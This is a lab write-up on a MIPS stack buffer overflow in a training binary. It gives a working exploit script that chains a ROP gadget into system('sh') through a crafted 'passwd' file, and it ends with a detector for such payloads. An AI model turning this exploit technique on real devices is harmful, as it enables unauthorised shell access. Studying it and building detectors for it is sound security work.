MIPS buffer overflow — exploit
Using the offset obtained from the analysis above, the next step is to assemble the shellcode. First, use the IDA script mipsrop.py to look for a usable ROP chain.

After jumping into this ROP gadget, the command that system will execute has to be placed where the gadget expects it:
cmd == value of register A1 == loaded from $sp + (0x58 - 0x40) in the gadget at 0x00402060
address == value of register RA == loaded from $sp + (0x58 - 0x4)

The value in register RA has to be the function that performs the system call. Locate do_system_0 by function name and look at the call instruction; its address is 0x00400708, so this address is stored at offset 0x40 – 0x4 == 0x3C (counted from the start of the command).

The ROP chain worked out from this (the version in the book contains errors)

Based on this, write exp.py:
```python
#!/usr/bin/env python3
import struct

print('[*] prepare shellcode ', end='')
# Command passed to system(); pad with NUL bytes up to a 4-byte boundary
cmd = b'sh'
cmd += b'\x00' * (4 - (len(cmd) % 4))
shellcode = b'A' * 0x19c                       # filler up to the saved return address
shellcode += struct.pack('>L', 0x00402060)     # return into the ROP gadget
shellcode += b'A' * 0x18                       # padding up to $sp+0x18 (0x58-0x40), where A1 is loaded
shellcode += cmd                               # argument for system
shellcode += b'B' * (0x3C - len(cmd))          # padding up to $sp+0x54 (0x58-0x4), where RA is loaded
shellcode += struct.pack('>L', 0x00400708)     # address of the call to system in do_system_0
shellcode += b'CCCC'
print(' ok')

print('[+] create passwd file ', end='')
with open('passwd', 'wb') as fw:
    fw.write(shellcode)
print(' ok')
```
Run the Python script; the shellcode is written to the passwd file successfully.

Run the vuln_system program; the prized $ prompt appears, which shows that the exploit succeeded.
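As an added example (not from the original post or the book), a small Python 3 checker that scans an input file such as the crafted passwd for the hallmarks of this payload: a long run of filler bytes followed by big-endian words that land inside the program's code region. The .text range is an assumption (both gadget addresses on the page fall inside it), and the sample input is constructed here to follow the layout described above.

```python
import struct

# Assumed .text range of vuln_system; 0x00400708 and 0x00402060 both lie inside it.
TEXT_RANGE = (0x00400000, 0x00410000)


def build_sample_payload():
    """Constructed sample following the passwd layout described above (test data)."""
    cmd = b"sh"
    cmd += b"\x00" * (4 - len(cmd) % 4)
    p = b"A" * 0x19c
    p += struct.pack(">L", 0x00402060)   # gadget address
    p += b"A" * 0x18
    p += cmd
    p += b"B" * (0x3C - len(cmd))
    p += struct.pack(">L", 0x00400708)   # do_system_0 call address
    p += b"CCCC"
    return p


def longest_filler_run(data, min_len=64):
    """Return (offset, length, byte) of the longest run of one repeated byte, or None."""
    best = None
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i >= min_len and (best is None or j - i > best[1]):
            best = (i, j - i, data[i])
        i = j
    return best


def code_pointers(data, text_range):
    """Offsets of 4-byte big-endian words (checked at every byte offset) inside the .text range."""
    lo, hi = text_range
    hits = []
    for off in range(0, len(data) - 3):
        word = struct.unpack(">L", data[off:off + 4])[0]
        if lo <= word < hi:
            hits.append((off, word))
    return hits


def looks_like_rop_payload(data, text_range):
    """Flag data that has a long filler run and at least two in-range code pointers."""
    run = longest_filler_run(data)
    return run is not None and len(code_pointers(data, text_range)) >= 2
```

For the constructed sample the two pointers are found at 0x19c and 0x1f4, i.e. 0x58 bytes apart, matching the $sp+0x54 RA slot of the gadget; a normal passwd line produces no hit.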
